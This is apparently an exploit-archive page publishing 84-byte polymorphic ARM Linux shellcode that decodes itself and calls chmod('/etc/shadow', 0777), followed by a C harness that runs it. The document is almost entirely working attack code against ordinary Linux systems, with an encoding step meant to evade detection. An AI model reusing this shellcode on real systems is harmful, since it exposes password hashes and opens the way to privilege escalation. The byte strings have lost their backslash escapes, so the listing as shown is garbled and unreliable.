Linux/ARM - polymorphic chmod("/etc/shadow", 0777)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes
# Published : 2010-06-30
# Author : Florian Gaultier
# Previous Title : 29 bytes chmod("/etc/shadow", 0777) shellcode
# Next Title : Linux/ARM - Disable ASLR Security - 102 bytes

/*
 | Title:    Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes
 | Type:     Shellcode
 | Author:   Florian Gaultier <florian.gaultier@shell-storm.org>
 | Platform: Linux ARM (ARM926EJ-S rev 5 (v51))
 | [+]       http://www.shell-storm.org
*/


#include <stdio.h>


char shellcode[] =
"x24x60x8fxe2"     //add r6, pc, #36
"x16xffx2fxe1"     //bx r6
"xdex40xa0xe3"     //mov r4, #222
"x01x0cx54xe3"     //cmp r4, #256
"x1exffx2fx81"     //bxhi lr
"xdex40x44xe2"     //sub r4, r4, #222
"x04x50xdexe7"     //ldrb r5, [lr, r4]
"x02x50x85xe2"     //add r5, r5, #2 (add 2 at every shellcode's byte)
"x04x50xcexe7"     //strb r5, [lr, r4]
"xdfx40x84xe2"     //add r4, r4, #223
"xf7xffxffxea"     //b 8078
"xf5xffxffxeb"     //bl 8074
//shellcode crypted
"xffx5ex8dxe0"
"x14xfdx2dxdf"
"x76x44"
"x0ax2e"
"xfdx1f"
"xfdx2f"
"x0dx25"
"xffxdd"
"xffx25"
"xffxdd"
"-cra-qf_bmu";


int main()
{
        (*(void(*)()) shellcode)();

return 0;
}